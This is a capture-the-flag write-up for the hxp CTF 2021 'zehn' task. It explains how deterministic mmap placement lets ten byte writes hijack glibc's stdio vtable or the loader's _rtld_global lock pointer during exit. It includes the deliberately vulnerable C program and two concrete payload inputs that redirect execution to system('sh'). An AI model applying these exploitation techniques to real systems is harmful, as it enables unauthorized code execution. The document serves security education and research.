hxp CTF 2021: zehn writeup
This task is about determinism of ASLR as implemented by the Linux kernel (in early 2022): One of the mechanisms to obtain an aslr’d piece of memory is via the mmap system call which, (un)fortunately, allocates memory at predictable relative distances from each other. The task description gave a link to a proposed patch set remedying the issue by introducing a randomize_va_space level 3 for full randomization, but so far it hasn’t been adopted.
The vulnerable program would allow to write at most 10 (zehn = ten) bytes relative to the beginning of a freshly allocated chunk at user-specified offsets:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv)
{
size_t size = 0;
size_t idx = 0;
unsigned int i = 0;
unsigned char val = 0;
unsigned char *ptr = NULL;
size_t *doit = NULL;
if (scanf("%zx", &size) != 1)
goto fail;
ptr = calloc(size, sizeof(unsigned char));
if (!ptr)
goto fail;
if ((scanf("%zx", &size) != 1) || !((size < 11) && (size >= 0)))
goto fail;
doit = calloc(size, 2 * sizeof(size_t));
if (!doit)
goto fail;
while ((i < size) && (scanf("%zx %hhx", &idx, &val) == 2)) {
doit[2 * i] = idx;
doit[2 * i + 1] = val;
i++;
}
for (i = 0; i < size; i++) {
ptr[doit[2 * i]] = (unsigned char)doit[2 * i + 1];
}
exit(0);
fail:
exit(-1);
}
The first trick is that calloc/malloc fall back to allocating memory via mmap (instead of operating in the program break via sbrk) if the requested allocation size is larger than mp_:mmap_threshold. We can confirm this by consulting the source code of the libc version shipped with the challenge. This is malloc.c from glibc-2.33, line 2403:
/*
sysmalloc handles malloc cases requiring more memory from the system.
On entry, it is assumed that av->top does not have enough
space to service request for nb bytes, thus requiring that av->top
be extended or replaced.
*/
static void *
sysmalloc (INTERNAL_SIZE_T nb, mstate av)
{
mchunkptr old_top; /* incoming value of av->top */
INTERNAL_SIZE_T old_size; /* its size */
char *old_end; /* its end address */
long size; /* arg to first MORECORE or mmap call */
char *brk; /* return value from MORECORE */
long correction; /* arg to 2nd MORECORE call */
char *snd_brk; /* 2nd return val */
INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
INTERNAL_SIZE_T end_misalign; /* partial page left at end of new space */
char *aligned_brk; /* aligned offset into brk */
mchunkptr p; /* the allocated/returned chunk */
mchunkptr remainder; /* remainder from allocation */
unsigned long remainder_size; /* its size */
size_t pagesize = GLRO (dl_pagesize);
bool tried_mmap = false;
/*
If have mmap, and the request size meets the mmap threshold, and
the system supports mmap, and there are few enough currently
allocated mmapped regions, try to directly map this request
rather than expanding top.
*/
if (av == NULL
|| ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
&& (mp_.n_mmaps < mp_.n_mmaps_max)))
{
char *mm; /* return value from mmap call*/
try_mmap:
/*
Round up size to nearest page. For mmapped chunks, the overhead
is one SIZE_SZ unit larger than for normal chunks, because there
is no following chunk whose prev_size field could be used.
See the front_misalign handling below, for glibc there is no
need for further alignments unless we have have high alignment.
*/
if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ)
size = ALIGN_UP (nb + SIZE_SZ, pagesize);
else
size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
tried_mmap = true;
/* Don't try if size wraps around 0 */
if ((unsigned long) (size) > (unsigned long) (nb))
{
mm = (char *) (MMAP (0, size,
MTAG_MMAP_FLAGS | PROT_READ | PROT_WRITE, 0));
// >% snip
The value of mp_.mmap_threshold can be set at run-time via the M_MMAP_THRESHOLD value passed to the mallopt function. By default, the threshold is set to 0x20000. For example, a calloc(0x21000) will return a chunk freshly allocated by mmap at constant distance to all dynamic libraries in the address space. Hence, no ASLR leak is required to solve this challenge. Furthermore, even though the vulnerable program calls exit immediately after letting the player overwrite (at most) ten bytes, there is a lot of code dispatched during exit handling providing promising targets to reach code execution.
From here, many approaches as to what data structure to overwrite exist. As part of this writeup, we will present two possible exploitation vectors.
Approach 1: Abuse Cleanup Mechanism of stdio
During exit, glibc flushes and cleans up all data that might still reside in its internal buffers. During this operation, execution reaches the _IO_cleanup function, which calls _IO_unbuffer_all (the later having been inlined in the given glibc binary, but this is not a problem for exploitation):
/* The following is a bit tricky. In general, we want to unbuffer the
streams so that all output which follows is seen. If we are not
looking for memory leaks it does not make much sense to free the
actual buffer because this will happen anyway once the program
terminated. If we do want to look for memory leaks we have to free
the buffers. Whether something is freed is determined by the
function sin the libc_freeres section. Those are called as part of
the atexit routine, just like _IO_cleanup. The problem is we do
not know whether the freeres code is called first or _IO_cleanup.
if the former is the case, we set the DEALLOC_BUFFER variable to
true and _IO_unbuffer_all will take care of the rest. If
_IO_unbuffer_all is called first we add the streams to a list
which the freeres function later can walk through. */
static void _IO_unbuffer_all (void);
static bool dealloc_buffers;
static FILE *freeres_list;
static void
_IO_unbuffer_all (void)
{
FILE *fp;
#ifdef _IO_MTSAFE_IO
_IO_cleanup_region_start_noarg (flush_cleanup);
_IO_lock_lock (list_all_lock);
#endif
for (fp = (FILE *) _IO_list_all; fp; fp = fp->_chain)
{
int legacy = 0;
#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1)
if (__glibc_unlikely (_IO_vtable_offset (fp) != 0))
legacy = 1;
#endif
if (! (fp->_flags & _IO_UNBUFFERED)
/* Iff stream is un-orientated, it wasn't used. */
&& (legacy || fp->_mode != 0))
{
#ifdef _IO_MTSAFE_IO
int cnt;
#define MAXTRIES 2
for (cnt = 0; cnt < MAXTRIES; ++cnt)
if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0)
break;
else
/* Give the other thread time to finish up its use of the
stream. */
__sched_yield ();
#endif
if (! legacy && ! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
{
fp->_flags |= _IO_USER_BUF;
fp->_freeres_list = freeres_list;
freeres_list = fp;
fp->_freeres_buf = fp->_IO_buf_base;
}
_IO_SETBUF (fp, NULL, 0); /* !!! attack here !!! */
if (! legacy && fp->_mode > 0)
_IO_wsetb (fp, NULL, NULL, 0);
#ifdef _IO_MTSAFE_IO
if (cnt < MAXTRIES && fp->_lock != NULL)
_IO_lock_unlock (*fp->_lock);
#endif
}
/* Make sure that never again the wide char functions can be
used. */
if (! legacy)
fp->_mode = -1;
}
#ifdef _IO_MTSAFE_IO
_IO_lock_unlock (list_all_lock);
_IO_cleanup_region_end (0);
#endif
}
The function traverses _IO_list_all and calls _IO_SETBUF on each unbuffered file. Due to glibc’s internal structure, the call to _IO_SETBUF is hijackable. This is because stdio’s functionality is implemented via vtables, which happen to be lists of function pointers residing in writeable memory. Some sanitization is performed on those pointers at runtime via IO_vtable_check, but for some reason this sanitization doesn’t trigger in our case.
To understand what’s going on, we need the definitions of struct _IO_FILE, which is wrapped by struct _IO_FILE_complete, as defined in struct_FILE.h (line 46):
/* The tag name of this struct is _IO_FILE to preserve historic
C++ mangled names for functions taking FILE* arguments.
That name should not be used in new code. */
struct _IO_FILE
{
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
/* The following pointers correspond to the C++ streambuf protocol. */
char *_IO_read_ptr; /* Current read pointer */
char *_IO_read_end; /* End of get area. */
char *_IO_read_base; /* Start of putback+get area. */
char *_IO_write_base; /* Start of put area. */
char *_IO_write_ptr; /* Current put pointer. */
char *_IO_write_end; /* End of put area. */
char *_IO_buf_base; /* Start of reserve area. */
char *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
int _flags2;
__off_t _old_offset; /* This used to be _offset but it's too small. */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
struct _IO_FILE_complete
{
struct _IO_FILE _file;
#endif
__off64_t _offset;
/* Wide character stream stuff. */
struct _IO_codecvt *_codecvt;
struct _IO_wide_data *_wide_data;
struct _IO_FILE *_freeres_list;
void *_freeres_buf;
size_t __pad5;
int _mode;
/* Make sure we don't get into trouble again. */
char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};
This structure is embedded into a struct _IO_FILE_plus, meaning that there is another trailing pointer pointing to the vtable.
struct _IO_FILE_plus
{
FILE file;
const struct _IO_jump_t *vtable;
};
Combining all of this together means that the memory layout looks as follows:
.data:00000000001C0800 public _IO_2_1_stdin_
.data:00000000001C0800 _IO_2_1_stdin_ dd 0FBAD2088h ; DATA XREF: LOAD:0000000000009B40↑o
.data:00000000001C0800 ; .got:_IO_2_1_stdin__ptr↑o ...
.data:00000000001C0804 dq 0 ; _IO_read_ptr
.data:00000000001C080C dq 0 ; _IO_read_end
.data:00000000001C0814 dq 0 ; _IO_read_base
.data:00000000001C081C dq 0 ; _IO_write_base
.data:00000000001C0824 dq 0 ; _IO_write_ptr
.data:00000000001C082C dq 0 ; _IO_write_end
.data:00000000001C0834 dq 0 ; _IO_buf_base
.data:00000000001C083C dq 0 ; _IO_buf_end
.data:00000000001C0844 dq 0 ; _IO_save_base
.data:00000000001C084C dq 0 ; _IO_backup_base
.data:00000000001C0854 dq 0 ; _IO_save_end
.data:00000000001C085C dq 0 ; _markers
.data:00000000001C0864 dq 0 ; _chain
.data:00000000001C086C dd 0 ; _fileno
.data:00000000001C0870 dd 0 ; _flags2
.data:00000000001C0874 dq 0FFFFFFFF00000000h ; _old_offset
.data:00000000001C087C dw 0FFFFh ; _cur_column
.data:00000000001C087E db 0FFh ; _vtable_offset
.data:00000000001C087F db 0FFh ; _shortbuf
.data:00000000001C0880 db 0
.data:00000000001C0881 db 0
.data:00000000001C0882 db 0
.data:00000000001C0883 db 0
.data:00000000001C0884 db 0
.data:00000000001C0885 db 0
.data:00000000001C0886 db 0
.data:00000000001C0887 db 0
.data:00000000001C0888 dq offset _IO_stdfile_0_lock ; _lock
.data:00000000001C0890 dq 0FFFFFFFFFFFFFFFFh ; _offset
.data:00000000001C0898 dq 0 ; _codecvt
.data:00000000001C08A0 dq offset _IO_wide_data_0 ; _wide_data
.data:00000000001C08A8 dq 0 ; _freeres_list
.data:00000000001C08B0 dq 0 ; _freeres_buf
.data:00000000001C08B8 dq 0 ; __pad5
.data:00000000001C08C0 dd 0 ; _mode
.data:00000000001C08C4 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ; _unused2
.data:00000000001C08C4 db 0, 0
.data:00000000001C08D8 dq offset __GI__IO_file_jumps ; vtable
Combine the knowledge of this data structure with the ASM code of _IO_cleanup/_IO_unbuffer_all:
; %< snip >%
.text:0000000000083A53 loc_83A53: ; CODE XREF: _IO_cleanup+6E↑j
.text:0000000000083A53 mov eax, dword ptr cs:list_all_lock+4
.text:0000000000083A59 mov r14, cs:__GI__IO_list_all
; >% snip %<
.text:0000000000083B1C loc_83B1C: ; CODE XREF: _IO_cleanup+14F↑j
.text:0000000000083B1C ; _IO_cleanup+2B6↓j
.text:0000000000083B1C mov rax, [r14+0D8h]
; >% snip %<
.text:0000000000083B32 loc_83B32: ; CODE XREF: _IO_cleanup+317↓j
.text:0000000000083B32 xor edx, edx
.text:0000000000083B34 xor esi, esi
.text:0000000000083B36 mov rdi, r14
.text:0000000000083B39 call qword ptr [rax+58h]
First r14 gets initialized to point to the beginning of the file structure(s) at 0x83a59. Then, the vtable member at structure offset 0xd8 is loaded into rax. Within the _IO_file_jumps table, the function pointer at offset 0x58 is, unsurprisingly, function __GI__IO_file_setbuf:
__libc_IO_vtables:00000000001C2300 __GI__IO_file_jumps dq 0 ; DATA XREF: LOAD:000000000000E358↑o
__libc_IO_vtables:00000000001C2300 ; check_stdfiles_vtables+B↑o ...
__libc_IO_vtables:00000000001C2300 ; Alternative name is '_IO_file_jumps'
__libc_IO_vtables:00000000001C2308 dq 0
__libc_IO_vtables:00000000001C2310 dq offset __GI__IO_file_finish
__libc_IO_vtables:00000000001C2318 dq offset __GI__IO_file_overflow
__libc_IO_vtables:00000000001C2320 dq offset __GI__IO_file_underflow
__libc_IO_vtables:00000000001C2328 dq offset __GI__IO_default_uflow
__libc_IO_vtables:00000000001C2330 dq offset __GI__IO_default_pbackfail
__libc_IO_vtables:00000000001C2338 dq offset __GI__IO_file_xsputn
__libc_IO_vtables:00000000001C2340 dq offset __GI__IO_file_xsgetn
__libc_IO_vtables:00000000001C2348 dq offset __GI__IO_file_seekoff
__libc_IO_vtables:00000000001C2350 dq offset _IO_default_seekpos
__libc_IO_vtables:00000000001C2358 dq offset __GI__IO_file_setbuf ; <- attackable pointer
__libc_IO_vtables:00000000001C2360 dq offset __GI__IO_file_sync
__libc_IO_vtables:00000000001C2368 dq offset __GI__IO_file_doallocate
__libc_IO_vtables:00000000001C2370 dq offset __GI__IO_file_read
__libc_IO_vtables:00000000001C2378 dq offset _IO_new_file_write
__libc_IO_vtables:00000000001C2380 dq offset __GI__IO_file_seek
__libc_IO_vtables:00000000001C2388 dq offset __GI__IO_file_close
__libc_IO_vtables:00000000001C2390 dq offset __GI__IO_file_stat
__libc_IO_vtables:00000000001C2398 dq offset _IO_default_showmanyc
__libc_IO_vtables:00000000001C23A0 dq offset _IO_default_imbue
From here, exploitation es straightforward: Perform a 3-byte partial overwrite on the __GI__IO_file_setbuf pointer stored at libc_base+0x1C2358 to point to system (requiring a 12-bit ASLR bruteforce), and write the string ;sh to address libc_base+0x1C0804 to set the first argument for system. This is because the dispatching call at libc_base+0x83B39 passes a pointer to the file structure itself to the callee. Since the file structure starts with the file magic 0x0FBAD2088 including several status bits, and we prefer not to mess with the control flow’s logic, we simply overwrite the 3 bytes immediately after the file magic with ;sh to make sure we actually reach the vulnerable call. The ; will terminate the meaningless file-magic garbage command passed to system, and sh will then give us code execution.
To trigger code execution, pass (for example) the following input to the vulnerable program, remembering the 12-bit ASLR bruteforce:
0x30000 0x6 allocation size and number of bytes to write
0x1f5348 0xe0 partially overwrite _IO_file_jumps._IO_file_setbuf with pointer to system (XXXde0)
0x1f5349 0x7d
0x1f534a 0x13
0x1f37f4 0x3b overwrite _IO_2_1_stdin_._IO_read_ptr with ";sh"
0x1f37f5 0x73
0x1f37f6 0x68
Approach 2: Abuse Locking Mechanism of the Loader
The _dl_fini function is responsible for destructor handling of dynamically loaded objects, gets (almost) always called on program termination and dispatches globally writeable function pointers that can be overwritten to gain code execution.
The interesting part is in line 29 to 54 in dl-fini.c:
void
_dl_fini (void)
{
/* Lots of fun ahead. We have to call the destructors for all still
loaded objects, in all namespaces. The problem is that the ELF
specification now demands that dependencies between the modules
are taken into account. I.e., the destructor for a module is
called before the ones for any of its dependencies.
To make things more complicated, we cannot simply use the reverse
order of the constructors. Since the user might have loaded objects
using `dlopen' there are possibly several other modules with its
dependencies to be taken into account. Therefore we have to start
determining the order of the modules once again from the beginning. */
/* We run the destructors of the main namespaces last. As for the
other namespaces, we pick run the destructors in them in reverse
order of the namespace ID. */
#ifdef SHARED
int do_audit = 0;
again:
#endif
for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
{
/* Protect against concurrent loads and unloads. */
__rtld_lock_lock_recursive (GL(dl_load_lock));
Line 54 expands to
GL(dl_rtld_lock_recursive) (&(GL(dl_load_lock)).mutex)
expanding to
_rtld_global.dl_rtld_lock_recursive(&_rtld_global.dl_load_lock.mutex)
.
Since both are entries of the writeable global variable _rtld_global, one can overwrite both, the function pointer dl_rtld_lock_recursive, and the dl_load_lock mutex to gain an easy system("sh") primitive. The dl_rtld_lock_recursive pointer points to rtld_lock_default_lock_recursive in a single-threaded application, and to pthread_mutex_lock if the victim program was linked against libpthread. Both are a fair distance away from system, hence a 3-byte override is required to reach code execution. Of the overriding 3*8=24 bits, the lowest 12 bits are fixed (0xde0) leaving the remaining 12 ASLR’d bits for brute-force.
For the ld binary handed out with the challenge, this means that one needs to write
write "sh" to ld_base+0x30988, and a 24-bit value ending on 0xde0 (last three nibbles of system@glibc) to ld_base+0x30f90.
To trigger code execution, pass (for example) the following input to the vulnerable program, remembering the 12-bit ASLR bruteforce:
0x1000000 0x5 allocation size and number of bytes to write
0x1206978 0x73 overwrite _rtld_global.dl_load_lock.mutex with "sh"
0x1206979 0x68
0x1206f80 0xe0 partially overwrite _rtld_global.dl_rtld_lock_recursive with pointer to system (XXXde0)
0x1206f81 0xbd
0x1206f82 0x4b